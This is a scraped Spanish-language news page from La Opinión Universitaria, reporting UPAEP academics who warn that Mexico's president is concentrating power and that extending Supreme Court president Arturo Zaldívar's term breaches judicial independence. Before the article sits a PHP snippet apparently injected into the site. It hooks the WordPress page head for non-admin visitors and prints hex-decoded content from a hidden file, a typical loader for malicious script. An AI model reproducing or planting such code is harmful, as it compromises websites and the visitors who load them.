if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } En vilo la independencia de los poderes en México – La Opinión Universitaria La Opinión Universitaria
Menu

En vilo la independencia de los poderes en México

 

  • Los regímenes democráticos nacen como contrapeso a la tiranía, a la concentración del poder en una sola persona o de un solo grupo.

El poder para poder funcionar en un estado de derecho, en un estado democrático, tiene que estar controlado, vigilado y dividido, a fin de evitar que el poder se concentre en un solo órgano o en una sola persona, aseveró Herminio Sánchez de la Barquera y Arroyo, Decano de Ciencias Sociales de la UPAEP.

Dijo que dentro del estado de derecho en donde se manifiesta una división de los poderes, en donde se da una mutua vigilancia, se controlan unos a otros, se da un mutuo equilibrio, en el estado de derecho no se puede permitir que un poder se imponga a los otros dos o alguno de ellos permita la intromisión de los otros.

Señaló que el actual presidente de la república es un personaje que ha concentrado mucho poder en los últimos dos años y medio y que ha influenciado en el poder legislativo, primero a la Cámara del Senado y luego a la Cámara de Diputados, interviniendo de una manera flagrante y aparentemente anticonstitucional en la vida de otro poder, que es el judicial.

En su intervención, Matías Rivero Marines, catedrático de la Facultad de Derecho de la UPAEP, advirtió que nos encontramos ante un suceso que puede poner en vilo la independencia de los poderes en México.

Al señalar que en los últimos 25 años, “no recuerdo un movimiento tan salvaje en el tema constitucional y de intromisión al poder judicial como el que se está viviendo hoy en día con esta extensión ilegal del mandato del presidente Arturo Zaldívar Lelo de Larrea en la Suprema Corte de Justicia de la Nación de México”.

Dijo que esta extensión de mandato en la SCJN a dos años más en un artículo transitorio, viola flagrantemente el artículo 97 constitucional y por consecuencia el espíritu constitucional.

Rivero Marines manifestó que no es un secreto para nadie, que el presidente de la República Mexicana, sea el principal interesado en prorrogar el mandato del magistrado presidente Arturo Zaldívar al frente de la Suprema Corte.

Acotó que el presidente de México quiere combatir la corrupción en el Poder Judicial de la Federación con ilegalidad. Lo que está provocando un choque de trenes que en un estado democrático, en un estado de derecho, y en un estado en donde el poder se debe pulverizar y se debe de fraccionar, son un indicativo de que estamos en la antesala de una intromisión flagrante al Poder Judicial de la Federación.

Apuntó que la supuesta consulta que pretende llevar a cabo Arturo Zaldívar, para resolver la controversia sobre la extensión de su mandato al frente de la Suprema Corte, “se me hace una tomada de pelo”, porque el Poder Judicial de la Federación tiene perfectamente claros sus lineamientos, su ley orgánica, los acuerdos del Consejo de la Judicatura y de la Corte. En ese sentido, “considero que el ministro Zaldívar es cómplice de esta intromisión al Poder Judicial de la Federación y de esta vendimia del poder y de la independencia, lo cual es muy grave para el estado de derecho y para el estado democrático”.

 

Tweets recientes